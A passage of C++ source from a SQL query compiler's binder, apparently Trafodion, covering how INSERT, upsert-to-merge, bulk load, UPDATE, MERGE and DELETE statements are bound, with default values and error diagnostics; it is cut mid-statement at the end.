CMPASSERT(target.getItemExpr()->getOperatorType() == ITM_BASECOLUMN); ValueId defaultExprValId = ((BaseColumn *) target.getItemExpr())-> getComputedColumnExpr(); ValueIdMap updateToSelectMapCopy(updateToSelectMap()); // Use a copy to rewrite the value, to avoid requesting additional // values from the child. We ask the child for all entries in this // map in GenericUpdate::pushdownCoveredExpr(). updateToSelectMapCopy.rewriteValueIdDown(defaultExprValId, defaultExprValId); defaultValueExpr = defaultExprValId.getItemExpr(); } else defaultValueStr = (char *)zero_w_Str; } else { // a user column (cf. Insert::getColDefaultValue) CMPASSERT(NOT nacol->isComputedColumn()); // computed user cols not yet supported defaultValueStr = nacol->getDefaultValue(); } if (NOT defaultValueStr && NOT defaultValueExpr) { // 4024 column has neither a default nor an explicit value. *CmpCommon::diags() << DgSqlCode(-4024) << DgColumnName(nacol->getColName()); bindWA->setErrStatus(); return boundExpr; } if (defaultValueStr) { // If the column has a default class of COM_CURRENT_DEFAULT, // cast the default value (which is CURRENT_TIMESTAMP) to // the type of the column. Here we capture the type of the // column. COM_CURRENT_DEFAULT is only used for Datetime // columns. // if (nacol->getDefaultClass() == COM_CURRENT_DEFAULT) { castType = nacol->getType()->newCopy(bindWA->wHeap()); } else if ((nacol->getDefaultClass() == COM_IDENTITY_GENERATED_ALWAYS) || (nacol->getDefaultClass() == COM_IDENTITY_GENERATED_BY_DEFAULT)) { setSystemGeneratesIdentityValue(TRUE); } // Bind the default value, make an Assign, etc, as above Parser parser(bindWA->currentCmpContext()); // save the current parserflags setting ULng32 savedParserFlags = Get_SqlParser_Flags (0xFFFFFFFF); Set_SqlParser_Flags(INTERNAL_QUERY_FROM_EXEUTIL); Set_SqlParser_Flags(ALLOW_VOLATILE_SCHEMA_IN_TABLE_NAME); defaultValueExpr = parser.getItemExprTree(defaultValueStr); CMPASSERT(defaultValueExpr); // Restore parser flags settings to what they originally were Assign_SqlParser_Flags (savedParserFlags); } // defaultValueStr != NULL Assign *assign = NULL; // If the default value string was successfully parsed, // Create an ASSIGN node and bind. // if (defaultValueExpr) { // If there is a non-NULL castType, then cast the default // value to the castType. This is used in the case of // datetime value with COM_CURRENT_DEFAULT. The default // value will be CURRENT_TIMESTAMP for all datetime types, // so must cast the CURRENT_TIMESTAMP to the type of the // column. // if(castType) { defaultValueExpr = new (bindWA->wHeap()) Cast(defaultValueExpr, castType); } // system generates value for IDENTITY column. if (defaultValueExpr->getOperatorType() == ITM_IDENTITY && (CmpCommon::getDefault(COMP_BOOL_210) == DF_ON)) { // SequenceGenerator::createSequenceSubqueryExpression() // is called for introducing the subquery in // defaultValueExpr::bindNode() (IdentityVar::bindNode()). // We bind here to make sure the correct subquery // is used. defaultValueExpr = defaultValueExpr->bindNode(bindWA); } if (((isUpsertLoad()) || ((isUpsert()) && (getTableDesc()->getNATable()-> isSQLMXAlignedTable()))) && (NOT defaultValueExpr->getOperatorType() == ITM_IDENTITY) && (NOT isASystemColumn)) { // for 'upsert using load' construct, all values must be specified so // data could be loaded using inserts. // If some values are missing, then it becomes an update. *CmpCommon::diags() << DgSqlCode(-4246) ; bindWA->setErrStatus(); return boundExpr; } assign = new (bindWA->wHeap()) Assign(target.getItemExpr(), defaultValueExpr, FALSE /*not user-specified*/); assign->bindNode(bindWA); } // // Note: Parser or Binder errors from MP texts are possible. // if (!defaultValueExpr || bindWA->errStatus()) { // 7001 Error preparing default on <column> for <table>. *CmpCommon::diags() << DgSqlCode(-7001) << DgString0(defaultValueStr) << DgString1(nacol->getFullColRefNameAsAnsiString()); bindWA->setErrStatus(); return boundExpr; } newRecExprArray().insertAt(i, assign->getValueId()); newRecExpr().insert(assign->getValueId()); updateToSelectMap().addMapEntry(target,defaultValueExpr->getValueId()); if (needToDeallocateColDefaultValueStr && defaultValueStr != NULL) { NADELETEBASIC((NAWchar*)defaultValueStr, bindWA->wHeap()); defaultValueStr = NULL; } if (--defaultColCount == 0) break; // tiny performance hack } // NOT newRecExprArray().used(i) else { if (nacol->getDefaultClass() == COM_IDENTITY_GENERATED_ALWAYS) { Assign * assign = (Assign*)newRecExprArray()[i].getItemExpr(); ItemExpr * ie = assign->getSource().getItemExpr(); if (NOT ie->wasDefaultClause()) { *CmpCommon::diags() << DgSqlCode(-3428) << DgString0(nacol->getColName()); bindWA->setErrStatus(); return boundExpr; } } } if (isASystemColumn) sysColIx++; else usrColIx++; } // for i < totalColCount } // defaultColCount // Now add the default values created as part of the Assigns above // to the charcteristic inputs. The user specified values are added // to the characteristic inputs during GenericUpdate::bindNode // executed earlier as part of this method. getGroupAttr()->addCharacteristicInputs(bindWA-> getCurrentScope()-> getOuterRefs()); if (isRRTable) { // LCOV_EXCL_START - const LIST(IndexDesc *) indexes = getTableDesc()->getIndexes(); for(i = 0; i < indexes.entries(); i++) { indexes[i]->getPartitioningFunction()->setAssignPartition(TRUE); } // LCOV_EXCL_STOP } // It is a system generated identity value if // identityColumn() != NULL_VALUE_ID. The identityColumn() // is set two places (1) earlier in this method. // (2) DefaultSpecification::bindNode() // The IDENTITY column of type GENERATED ALWAYS AS IDENTITY // must be specified in the values list as (DEFAULT) or // must be excluded from the values list forcing the default. if (identityColumnGeneratedAlways && NOT systemGeneratesIdentityValue()) { // The IDENTITY column type of GENERATED ALWAYS AS IDENTITY // can not be used with user specified values. // However, if the override CQD is set, then // allow user specified values to be added // for a GENERATED ALWAYS AS IDENTITY column. if (CmpCommon::getDefault(OVERRIDE_GENERATED_IDENTITY_VALUES) == DF_OFF) { *CmpCommon::diags() << DgSqlCode(-3428) << DgString0(identityColumnName.data()); bindWA->setErrStatus(); return boundExpr; } } ItemExpr *orderByTree = removeOrderByTree(); if (orderByTree) { bindWA->getCurrentScope()->context()->inOrderBy() = TRUE; bindWA->getCurrentScope()->setRETDesc(child(0)->getRETDesc()); orderByTree->convertToValueIdList(reqdOrder(), bindWA, ITM_ITEM_LIST); bindWA->getCurrentScope()->context()->inOrderBy() = FALSE; if (bindWA->errStatus()) return NULL; bindWA->getCurrentScope()->setRETDesc(getRETDesc()); } setInUpdateOrInsert(bindWA); // Triggers -- NABoolean insertFromValuesList = getOperatorType() == REL_UNARY_INSERT && (child(0)->getOperatorType() == REL_TUPLE || // VALUES (1,'b') child(0)->getOperatorType() == REL_TUPLE_LIST || // VALUES (1,'b'),(2,'Y') child(0)->getOperatorType() == REL_UNION); // VALUES with subquery // Insert from values that gets input from above should not use flow, // for performance. Cases, other than TUPLE, should be investigated. if (bindWA->findNextScopeWithTriggerInfo() != NULL && (getGroupAttr()->getCharacteristicInputs() != NULL) && (insertFromValuesList)) setNoFlow(TRUE); if (getUpdateCKorUniqueIndexKey()) { SqlTableOpenInfo * scanStoi = getLeftmostScanNode()->getOptStoi()->getStoi(); short updateColsCount = scanStoi->getColumnListCount(); getOptStoi()->getStoi()->setColumnListCount(updateColsCount); getOptStoi()->getStoi()->setColumnList(new (bindWA->wHeap()) short[updateColsCount]); for (short i=0; i<updateColsCount; i++) getOptStoi()->getStoi()->setUpdateColumn(i,scanStoi->getUpdateColumn(i)); } if ((getIsTrafLoadPrep()) && (getTableDesc()->getCheckConstraints().entries() != 0 || getTableDesc()->getNATable()->getRefConstraints().entries() != 0 )) { // enabling/disabling constraints is not supported yet //4486--Constraints not supported with bulk load. Disable the constraints and try again. *CmpCommon::diags() << DgSqlCode(-4486) << DgString0("bulk load") ; } if (getIsTrafLoadPrep()) { PartitioningFunction *pf = getTableDesc()->getClusteringIndex()->getPartitioningFunction(); const NodeMap* np; Lng32 partns = 1; if ( pf && (np = pf->getNodeMap()) ) { partns = np->getNumEntries(); if(partns > 1 && CmpCommon::getDefault(ATTEMPT_ESP_PARALLELISM) == DF_OFF) // 4490 - BULK LOAD into a salted table is not supported if ESP parallelism is turned off *CmpCommon::diags() << DgSqlCode(-4490); } } if (isUpsertThatNeedsMerge()) { boundExpr = xformUpsertToMerge(bindWA); return boundExpr; } else if (NOT (isMerge() || noIMneeded())) boundExpr = handleInlining(bindWA, boundExpr); // turn OFF Non-atomic Inserts for ODBC if we have detected that Inlining is needed // necessary warnings have been generated in handleInlining method. if (CmpCommon::getDefault(ODBC_PROCESS) == DF_ON) { if (bindWA->getHostArraysArea() && (NOT bindWA->getHostArraysArea()->getRowwiseRowset()) && !(bindWA->getHostArraysArea()->getTolerateNonFatalError())) setTolerateNonFatalError(RelExpr::UNSPECIFIED_); } // When mtsStatement_ or bulkLoadIndex is set Insert needs to return rows; // so potential outputs are added (note that it's not replaced) to // the Insert node. Currently mtsStatement_ is set // for MTS queries and embedded insert queries. if (isMtsStatement() || bulkLoadIndex) { if(isMtsStatement()) setRETDesc(new (bindWA->wHeap()) RETDesc(bindWA, getTableDesc())); bindWA->getCurrentScope()->setRETDesc(getRETDesc()); ValueIdList outputs; getRETDesc()->getValueIdList(outputs, USER_AND_SYSTEM_COLUMNS); ValueIdSet potentialOutputs; getPotentialOutputValues(potentialOutputs); potentialOutputs.insertList(outputs); setPotentialOutputValues(potentialOutputs); // this flag is set to indicate optimizer not to pick the // TupleFlow operator setNoFlow(TRUE); } return boundExpr; } // Insert::bindNode() /* Upsert into a table with an index is converted into a Merge to avoid the problem described in LP 1460771. An upsert may overwrite an existing row in the base table (identical to the update when matched clause of Merge) or it may insert a new row into the base table (identical to insert when not matched clause of merge). If the upsert caused a row to be updated in the base table then the old version of the row will have to be deleted from indexes, and a new version inserted. Upsert is being transformed to merge so that we can delete the old version of an updated row from the index. */ NABoolean Insert::isUpsertThatNeedsMerge() const { if (!isUpsert() || getIsTrafLoadPrep() || (getTableDesc()->isIdentityColumnGeneratedAlways() && getTableDesc()->hasIdentityColumnInClusteringKey()) || getTableDesc()->getClusteringIndex()->getNAFileSet()->hasSyskey() || !(getTableDesc()->hasSecondaryIndexes())) return FALSE; return TRUE; } RelExpr* Insert::xformUpsertToMerge(BindWA *bindWA) { NATable *naTable = bindWA->getNATable(getTableName()); if (bindWA->errStatus()) return NULL; if ((naTable->getViewText() != NULL) && (naTable->getViewCheck())) { *CmpCommon::diags() << DgSqlCode(-3241) << DgString0(" View with check option not allowed."); bindWA->setErrStatus(); return NULL; } const ValueIdList &tableCols = updateToSelectMap().getTopValues(); const ValueIdList &sourceVals = updateToSelectMap().getBottomValues(); Scan * inputScan = new (bindWA->wHeap()) Scan(CorrName(getTableDesc()->getCorrNameObj(), bindWA->wHeap())); ItemExpr * keyPred = NULL; ItemExpr * keyPredPrev = NULL; ItemExpr * setAssign = NULL; ItemExpr * setAssignPrev = NULL; ItemExpr * insertVal = NULL; ItemExpr * insertValPrev = NULL; ItemExpr * insertCol = NULL; ItemExpr * insertColPrev = NULL; BaseColumn* baseCol; ColReference * targetColRef; int predCount = 0; int setCount = 0; ValueIdSet myOuterRefs; for (CollIndex i = 0; i<tableCols.entries(); i++) { baseCol = (BaseColumn *)(tableCols[i].getItemExpr()) ; if (baseCol->getNAColumn()->isSystemColumn()) continue; targetColRef = new(bindWA->wHeap()) ColReference( new(bindWA->wHeap()) ColRefName( baseCol->getNAColumn()->getFullColRefName(), bindWA->wHeap())); if (baseCol->getNAColumn()->isClusteringKey()) { keyPredPrev = keyPred; keyPred = new (bindWA->wHeap()) BiRelat(ITM_EQUAL, targetColRef, sourceVals[i].getItemExpr()); predCount++; if (predCount > 1) { keyPred = new(bindWA->wHeap()) BiLogic(ITM_AND, keyPredPrev, keyPred); } } else { setAssignPrev = setAssign; setAssign = new (bindWA->wHeap()) Assign(targetColRef, sourceVals[i].getItemExpr()); setCount++; if (setCount > 1) { setAssign = new(bindWA->wHeap()) ItemList(setAssign,setAssignPrev); } } myOuterRefs += sourceVals[i]; insertValPrev = insertVal; insertColPrev = insertCol ; insertVal = sourceVals[i].getItemExpr(); insertCol = new(bindWA->wHeap()) ColReference( new(bindWA->wHeap()) ColRefName( baseCol->getNAColumn()->getFullColRefName(), bindWA->wHeap())); if (i > 0) { insertVal = new(bindWA->wHeap()) ItemList(insertVal,insertValPrev); insertCol = new(bindWA->wHeap()) ItemList(insertCol,insertColPrev); } } inputScan->addSelPredTree(keyPred); RelExpr * re = NULL; re = new (bindWA->wHeap()) MergeUpdate(CorrName(getTableDesc()->getCorrNameObj(), bindWA->wHeap()), NULL, REL_UNARY_UPDATE, inputScan, setAssign, insertCol, insertVal, bindWA->wHeap(), NULL); ((MergeUpdate *)re)->setXformedUpsert(); ValueIdSet debugSet; if (child(0) && (child(0)->getOperatorType() != REL_TUPLE)) { RelExpr * mu = re; re = new(bindWA->wHeap()) Join (child(0), re, REL_TSJ_FLOW, NULL); ((Join*)re)->doNotTransformToTSJ(); ((Join*)re)->setTSJForMerge(TRUE); ((Join*)re)->setTSJForMergeWithInsert(TRUE); ((Join*)re)->setTSJForWrite(TRUE); if (bindWA->hasDynamicRowsetsInQuery()) mu->getGroupAttr()->addCharacteristicInputs(myOuterRefs); else re->getGroupAttr()->addCharacteristicInputs(myOuterRefs); } re = re->bindNode(bindWA); if (bindWA->errStatus()) return NULL; return re; } RelExpr *HBaseBulkLoadPrep::bindNode(BindWA *bindWA) { //CMPASSERT((CmpCommon::getDefault(TRAF_LOAD) == DF_ON && // CmpCommon::getDefault(TRAF_LOAD_HFILE) == DF_ON)); if (nodeIsBound()) { return this; } Insert * newInsert = new (bindWA->wHeap()) Insert(getTableName(), NULL, REL_UNARY_INSERT, child(0)->castToRelExpr()); newInsert->setInsertType(UPSERT_LOAD); newInsert->setIsTrafLoadPrep(true); newInsert->setCreateUstatSample(getCreateUstatSample()); // Pass the flag to bindWA to guarantee that a range partitioning is // always used for all source and target tables. bindWA->setIsTrafLoadPrep(TRUE); RelExpr *boundNewInsert = newInsert->bindNode(bindWA); if (bindWA->errStatus()) return NULL; return boundNewInsert; } // This is a callback from DefaultSpecification::bindNode // called from Insert::bindNode // (you need to understand the latter to understand this). // const char *Insert::getColDefaultValue(BindWA *bindWA, CollIndex i) const { CMPASSERT(canBindDefaultSpecification()); CollIndexList &colnoList = *targetUserColPosList_; CollIndex pos = colnoList.entries() ? colnoList[i] : i; const ValueIdList &colList = getTableDesc()->getColumnList(); if (colList.entries() <= pos) { // 4023 degree of row value constructor must equal that of target table *CmpCommon::diags() << DgSqlCode(-4023) #pragma nowarn(1506) // warning elimination << DgInt0(++pos) #pragma warn(1506) // warning elimination #pragma nowarn(1506) // warning elimination << DgInt1(colList.entries()); #pragma warn(1506) // warning elimination bindWA->setErrStatus(); return NULL; } ValueId target = colList[pos]; const NAColumn *nacol = target.getNAColumn(); const char* defaultValueStr = nacol->getDefaultValue(); CharInfo::CharSet mapCS = CharInfo::ISO88591; NABoolean mapCS_hasVariableWidth = CharInfo::isVariableWidthMultiByteCharSet(mapCS); size_t defaultValueWcsLen = 0; NAWchar *defaultValueWcs = (NAWchar *) defaultValueStr; NABoolean ucs2StrLitPrefix = FALSE; if (nacol->getDefaultClass() == COM_USER_DEFINED_DEFAULT && nacol->getType() && nacol->getType()->getTypeQualifier() == NA_CHARACTER_TYPE && ((CharType*)(nacol->getType()))->getCharSet() == CharInfo::ISO88591 && mapCS_hasVariableWidth && defaultValueWcs != NULL && nacol->getNATable()->getObjectSchemaVersion() >= COM_VERS_2300 && (defaultValueWcsLen = NAWstrlen(defaultValueWcs)) > 6 && ( ( ucs2StrLitPrefix = ( NAWstrncmp(defaultValueWcs, NAWSTR("_UCS2\'"), 6) == 0 )) || ( defaultValueWcsLen > 10 && NAWstrncmp(defaultValueWcs, NAWSTR("_ISO88591\'"), 10) == 0 )) && defaultValueWcs[defaultValueWcsLen-1] == NAWCHR('\'')) { NAWcharBuf *pWcharBuf = NULL; if (ucs2StrLitPrefix) { // Strip the leading _UCS2 prefix. pWcharBuf = new (bindWA->wHeap()) NAWcharBuf(&defaultValueWcs[5], defaultValueWcsLen - 5, bindWA->wHeap()); } else { // Keep the leading _ISO88591 prefix. pWcharBuf = new (bindWA->wHeap()) NAWcharBuf(defaultValueWcs, defaultValueWcsLen, bindWA->wHeap()); } charBuf *pCharBuf = NULL; // must set this variable to NULL so the // following function call will allocate // space for the output literal string Int32 errorcode = 0; pCharBuf = unicodeTocset(*pWcharBuf, bindWA->wHeap(), pCharBuf, mapCS, errorcode); // Earlier releases treated the converted multibyte character // string, in ISO_MAPPING character set, as if it is a string of // ISO88591 characters and then convert it back to UCS-2 format; // i.e., for each byte in the string, insert an extra byte // containing the binary zero value. NADELETE(pWcharBuf, NAWcharBuf, bindWA->wHeap()); pWcharBuf = NULL; // must set this variable to NULL to force the // following call to allocate space for the // the output literal string pWcharBuf = ISO88591ToUnicode(*pCharBuf, bindWA->wHeap(), pWcharBuf); // Prepare the converted literal string for the following CAST // function by setting pColDefaultValueStr to point to the string NAWchar *pWcs = NULL; if (ucs2StrLitPrefix) { pWcs = new (bindWA->wHeap()) NAWchar[10+NAWstrlen(pWcharBuf->data())]; NAWstrcpy(pWcs, NAWSTR("_ISO88591")); } else { pWcs = new (bindWA->wHeap()) NAWchar[1+NAWstrlen(pWcharBuf->data())]; pWcs[0] = NAWCHR('\0'); } NAWstrcat(pWcs, pWcharBuf->data()); defaultValueStr = (char *)pWcs; NADELETE(pWcharBuf, NAWcharBuf, bindWA->wHeap()); NADELETE(pCharBuf, charBuf, bindWA->wHeap()); } if (NOT defaultValueStr AND bindWA) { // 4107 column has no default so DEFAULT cannot be specified. *CmpCommon::diags() << DgSqlCode(-4107) << DgColumnName(nacol->getColName()); bindWA->setErrStatus(); } return defaultValueStr; } // Insert::getColDefaultValue() // ----------------------------------------------------------------------- // member functions for class Update // ----------------------------------------------------------------------- RelExpr *Update::bindNode(BindWA *bindWA) { if (nodeIsBound()) { bindWA->getCurrentScope()->setRETDesc(getRETDesc()); return this; } // Set flag for firstN in context if (child(0) && child(0)->getOperatorType() == REL_SCAN) if (child(0)->castToRelExpr() && ((Scan *)(child(0)->castToRelExpr()))->getFirstNRows() >= 0) if (bindWA && bindWA->getCurrentScope() && bindWA->getCurrentScope()->context()) bindWA->getCurrentScope()->context()->firstN() = TRUE; setInUpdateOrInsert(bindWA, this, REL_UPDATE); RelExpr * boundExpr = GenericUpdate::bindNode(bindWA); if (bindWA->errStatus()) return NULL; setInUpdateOrInsert(bindWA); if (getTableDesc()->getNATable()->isHbaseCellTable()) { *CmpCommon::diags() << DgSqlCode(-1425) << DgTableName(getTableDesc()->getNATable()->getTableName(). getQualifiedNameAsAnsiString()) << DgString0("Reason: Cannot update an hbase table in CELL format. Use ROW format for this operation."); bindWA->setErrStatus(); return this; } // QSTUFF if (getGroupAttr()->isStream() && !getGroupAttr()->isEmbeddedUpdateOrDelete()) { *CmpCommon::diags() << DgSqlCode(-4173); bindWA->setErrStatus(); return this; } // QSTUFF if (NOT bindWA->errStatus() AND NOT getTableDesc()->getVerticalPartitions().isEmpty()) { // 4058 UPDATE query cannot be used on a vertically partitioned table. *CmpCommon::diags() << DgSqlCode(-4058) << DgTableName(getTableDesc()->getNATable()->getTableName(). getQualifiedNameAsAnsiString()); bindWA->setErrStatus(); return this; } // make sure scan done as part of an update runs in serializable mode so a // tsj(scan,update) implementation of a update runs as an atomic operation if (child(0)->getOperatorType() == REL_SCAN) { Scan *scanNode = (Scan*)(child(0)->castToRelExpr()); if (!scanNode->accessOptions().userSpecified()) { scanNode->accessOptions().updateAccessOptions (TransMode::ILtoAT(TransMode::SERIALIZABLE_)); } } // if FIRST_N is requested, insert a FirstN node. if ((getOperatorType() == REL_UNARY_UPDATE) && (child(0)->getOperatorType() == REL_SCAN)) { Scan * scanNode = (Scan *)(child(0)->castToRelExpr()); if ((scanNode->getFirstNRows() != -1) && (getGroupAttr()->isEmbeddedUpdateOrDelete())) { *CmpCommon::diags() << DgSqlCode(-4216); bindWA->setErrStatus(); return NULL; } if (scanNode->getFirstNRows() >= 0) { FirstN * firstn = new(bindWA->wHeap()) FirstN(scanNode, scanNode->getFirstNRows(), NULL); firstn->bindNode(bindWA); if (bindWA->errStatus()) return NULL; setChild(0, firstn); } } // if rowset is used in set clause a direct rowset that is not in subquery // must be present in the where clause if ((bindWA->getHostArraysArea()) && (bindWA->getHostArraysArea()->hasHostArraysInSetClause()) && (!(bindWA->getHostArraysArea()->hasHostArraysInWhereClause()))) { *CmpCommon::diags() << DgSqlCode(-30021) ; bindWA->setErrStatus(); return this; } NABoolean transformUpdateKey = updatesClusteringKeyOrUniqueIndexKey(bindWA); if (bindWA->errStatus()) // error occurred in updatesCKOrUniqueIndexKey() return this; NABoolean xnsfrmHbaseUpdate = FALSE; if ((hbaseOper()) && (NOT isMerge())) { if (CmpCommon::getDefault(HBASE_TRANSFORM_UPDATE_TO_DELETE_INSERT) == DF_ON) { xnsfrmHbaseUpdate = TRUE; } else if ((CmpCommon::getDefault(HBASE_TRANSFORM_UPDATE_TO_DELETE_INSERT) == DF_SYSTEM) && (getTableDesc()->getNATable()->hasSecondaryIndexes())) { xnsfrmHbaseUpdate = TRUE; } else if (avoidHalloween()) { xnsfrmHbaseUpdate = TRUE; } else if (getCheckConstraints().entries()) { xnsfrmHbaseUpdate = TRUE; } } if (xnsfrmHbaseUpdate) { boundExpr = transformHbaseUpdate(bindWA); } else if ((transformUpdateKey) && (NOT isMerge())) { boundExpr = transformUpdatePrimaryKey(bindWA); } else boundExpr = handleInlining(bindWA, boundExpr); if (bindWA->errStatus()) // error occurred in transformUpdatePrimaryKey() return this; // or handleInlining() return boundExpr; } // Update::bindNode() // ----------------------------------------------------------------------- // member functions for class MergeUpdate // ----------------------------------------------------------------------- RelExpr *MergeUpdate::bindNode(BindWA *bindWA) { if (nodeIsBound()) { bindWA->getCurrentScope()->setRETDesc(getRETDesc()); return this; } bindWA->initNewScope(); if ((isMerge()) && (child(0))) { ItemExpr *selPred = child(0)->castToRelExpr()->selPredTree(); if (selPred || where_) { NABoolean ONhasSubquery = (selPred && selPred->containsSubquery()); NABoolean ONhasAggr = (selPred && selPred->containsAnAggregate()); NABoolean whrHasSubqry = FALSE; if (ONhasSubquery || ONhasAggr || (where_ && ((whrHasSubqry=where_->containsSubquery()) || where_->containsAnAggregate()))) { *CmpCommon::diags() << DgSqlCode(-3241) << DgString0 (ONhasSubquery ? "Subquery in ON clause not allowed." : (ONhasAggr ? "aggregate function in ON clause not allowed." : (whrHasSubqry ? "subquery in UPDATE ... WHERE clause not allowed." : "aggregate function in UPDATE ... WHERE clause not allowed."))); bindWA->setErrStatus(); return this; } ItemExpr *ONhasUDF = (selPred ? selPred->containsUDF() : NULL); ItemExpr *whereHasUDF = (where_ ? where_->containsUDF() : NULL); if (ONhasUDF || whereHasUDF) { *CmpCommon::diags() << DgSqlCode(-4471) << DgString0 (((UDFunction *)(ONhasUDF ? ONhasUDF : whereHasUDF))-> getFunctionName().getExternalName()); bindWA->setErrStatus(); return this; } } } if ((isMerge()) && (recExprTree())) { if (recExprTree()->containsSubquery()) { *CmpCommon::diags() << DgSqlCode(-3241) << DgString0(" Subquery in SET clause not allowed."); bindWA->setErrStatus(); return this; } if (recExprTree()->containsUDF()) { *CmpCommon::diags() << DgSqlCode(-4471) << DgString0(((UDFunction *)recExprTree()->containsUDF())-> getFunctionName().getExternalName()); bindWA->setErrStatus(); return this; } } // if insertValues, then this is an upsert stmt. if (insertValues()) { if (insertValues()->containsSubquery()) { *CmpCommon::diags() << DgSqlCode(-3241) << DgString0(" Subquery in INSERT clause not allowed."); bindWA->setErrStatus(); return this; } if (insertValues()->containsUDF()) { *CmpCommon::diags() << DgSqlCode(-4471) << DgString0(((UDFunction *)insertValues()->containsUDF())-> getFunctionName().getExternalName()); bindWA->setErrStatus(); return this; } Tuple * tuple = new (bindWA->wHeap()) Tuple(insertValues()); Insert * ins = new (bindWA->wHeap()) Insert(getTableName(), NULL, REL_UNARY_INSERT, tuple, insertCols(), NULL); ins->setInsertType(Insert::SIMPLE_INSERT); if (isMergeUpdate()) ins->setIsMergeUpdate(TRUE); else ins->setIsMergeDelete(TRUE); ins->setTableDesc(getTableDesc()); bindWA->getCurrentScope()->xtnmStack()->createXTNM(); ins = (Insert*)ins->bindNode(bindWA); if (bindWA->errStatus()) return NULL; bindWA->getCurrentScope()->xtnmStack()->removeXTNM(); mergeInsertRecExpr() = ins->newRecExpr(); mergeInsertRecExprArray() = ins->newRecExprArray(); } NATable *naTable = bindWA->getNATable(getTableName()); if (bindWA->errStatus()) return NULL; if ((naTable->getViewText() != NULL) && (naTable->getViewCheck())) { *CmpCommon::diags() << DgSqlCode(-3241) << DgString0(" View with check option not allowed."); bindWA->setErrStatus(); return NULL; } if ((naTable->isHbaseCellTable()) || (naTable->isHbaseRowTable())) { *CmpCommon::diags() << DgSqlCode(-3241) << DgString0("Hbase tables not supported."); bindWA->setErrStatus(); return NULL; } if (naTable->isHiveTable()) { *CmpCommon::diags() << DgSqlCode(-3241) << DgString0("Hive tables not supported."); bindWA->setErrStatus(); return NULL; } bindWA->setMergeStatement(TRUE); RelExpr * boundExpr = Update::bindNode(bindWA); if (bindWA->errStatus()) return NULL; if (checkForMergeRestrictions(bindWA)) return NULL; if (where_) { bindWA->getCurrentScope()->context()->inWhereClause() = TRUE; where_->convertToValueIdSet(mergeUpdatePred(), bindWA, ITM_AND); bindWA->getCurrentScope()->context()->inWhereClause() = FALSE; if (bindWA->errStatus()) return NULL; // any values added by where_ to Outer References Set should be // added to input values that must be supplied to this MergeUpdate getGroupAttr()->addCharacteristicInputs (bindWA->getCurrentScope()->getOuterRefs()); } bindWA->removeCurrentScope(); bindWA->setMergeStatement(TRUE); return boundExpr; } // MergeUpdate::bindNode() // ----------------------------------------------------------------------- // member functions for class Delete // ----------------------------------------------------------------------- RelExpr *Delete::bindNode(BindWA *bindWA) { if (nodeIsBound()) { bindWA->getCurrentScope()->setRETDesc(getRETDesc()); return this; } // Save the current scope and node for children to peruse if necessary. BindContext *context = bindWA->getCurrentScope()->context(); if (context) { context->deleteScope() = bindWA->getCurrentScope(); context->deleteNode() = this; if (getFirstNRows() >= 0) context->firstN() = TRUE; } RelExpr * boundExpr = GenericUpdate::bindNode(bindWA); if (bindWA->errStatus()) return boundExpr; if ((csl_) && (NOT getTableDesc()->getNATable()->isHbaseRowTable())) { *CmpCommon::diags() << DgSqlCode(-1425) << DgTableName(getTableDesc()->getNATable()->getTableName(). getQualifiedNameAsAnsiString()); bindWA->setErrStatus(); return this; } if (getTableDesc()->getNATable()->isHbaseCellTable()) { *CmpCommon::diags() << DgSqlCode(-1425) << DgTableName(getTableDesc()->getNATable()->getTableName(). getQualifiedNameAsAnsiString()) << DgString0("Reason: Cannot delete from an hbase table in CELL format. Use ROW format for this operation."); bindWA->setErrStatus(); return this; } // QSTUFF if (getGroupAttr()->isStream() && !getGroupAttr()->isEmbeddedUpdateOrDelete()) { *CmpCommon::diags() << DgSqlCode(-4180); bindWA->setErrStatus(); return this; } // QSTUFF // Not only are check constraints on a DELETE nonsensical, // but they can cause VEGReference::replaceVEGReference to assert // with valuesToBeBound.isEmpty (Genesis 10-980202-0718). // // in case we are binding a generic update within a generic update // due to view expansion we would like to ensure that all constraints // are checked properly for the update operation performed on the // underlying base table if (NOT (bindWA->inViewExpansion() && bindWA->inGenericUpdate())) { // QSTUFF getTableDesc()->checkConstraints().clear(); checkConstraints().clear(); } if (getTableDesc()->getClusteringIndex()->getNAFileSet()->isEntrySequenced()) { // 4018 DELETE query cannot be used against an Entry-Seq table. *CmpCommon::diags() << DgSqlCode(-4018) << DgTableName(getTableDesc()->getNATable()->getTableName(). getQualifiedNameAsAnsiString()); bindWA->setErrStatus(); return this; } if (NOT getTableDesc()->getVerticalPartitions().isEmpty()) { // 4029 DELETE query cannot be used on a vertically partitioned table. *CmpCommon::diags() << DgSqlCode(-4029) << DgTableName(getTableDesc()->getNATable()->getTableName(). getQualifiedNameAsAnsiString()); bindWA->setErrStatus(); return this; } Scan *scanNode = NULL; // make sure scan done as part of a delete runs in serializable mode so a // tsj(scan,delete) implementation of a delete runs as an atomic operation if (child(0)->getOperatorType() == REL_SCAN) { scanNode = (Scan*)(child(0)->castToRelExpr()); if (!scanNode->accessOptions().userSpecified()) { scanNode->accessOptions().updateAccessOptions (TransMode::ILtoAT(TransMode::SERIALIZABLE_)); } } BindScope *prevScope = NULL; BindScope *currScope = bindWA->getCurrentScope(); NABoolean inUnion = FALSE; while (currScope && !inUnion) { BindContext *currContext = currScope->context(); if (currContext->inUnion()) { inUnion = TRUE; } prevScope = currScope; currScope = bindWA->getPreviousScope(prevScope); } RelRoot *root = bindWA->getTopRoot(); if (getFirstNRows() >= 0) // First N Delete { CMPASSERT(getOperatorType() == REL_UNARY_DELETE); // First N Delete on a partitioned table. Not considered a MTS delete. if (getTableDesc()->getClusteringIndex()->isPartitioned()) { if (root->getCompExprTree() || inUnion ) // for unions we know there is a select { // outer selectnot allowed for "non-MTS" first N delete *CmpCommon::diags() << DgSqlCode(-4216); bindWA->setErrStatus(); return this; } RelExpr * childNode = child(0)->castToRelExpr(); FirstN * firstn = new(bindWA->wHeap()) FirstN(childNode, getFirstNRows(), NULL); firstn->bindNode(bindWA); if (bindWA->errStatus()) return NULL; setChild(0, firstn); setFirstNRows(-1); } else { // First N delete on a single partition. This is considered a MTS Delete. if ((bindWA->getHostArraysArea()) && ((bindWA->getHostArraysArea()->hasHostArraysInWhereClause()) || (bindWA->getHostArraysArea()->getHasSelectIntoRowsets()))) { // MTS delete not supported with rowsets *CmpCommon::diags() << DgSqlCode(-30037); bindWA->setErrStatus(); return this; } if (scanNode && scanNode->getSelectionPred().containsSubquery()) { // MTS Delete not supported with subquery in where clause *CmpCommon::diags() << DgSqlCode(-4138); bindWA->setErrStatus(); return this; } if (root->hasOrderBy()) { // mts delete not supported with order by *CmpCommon::diags() << DgSqlCode(-4189); bindWA->setErrStatus(); return this; } if (root->getCompExprTree() || 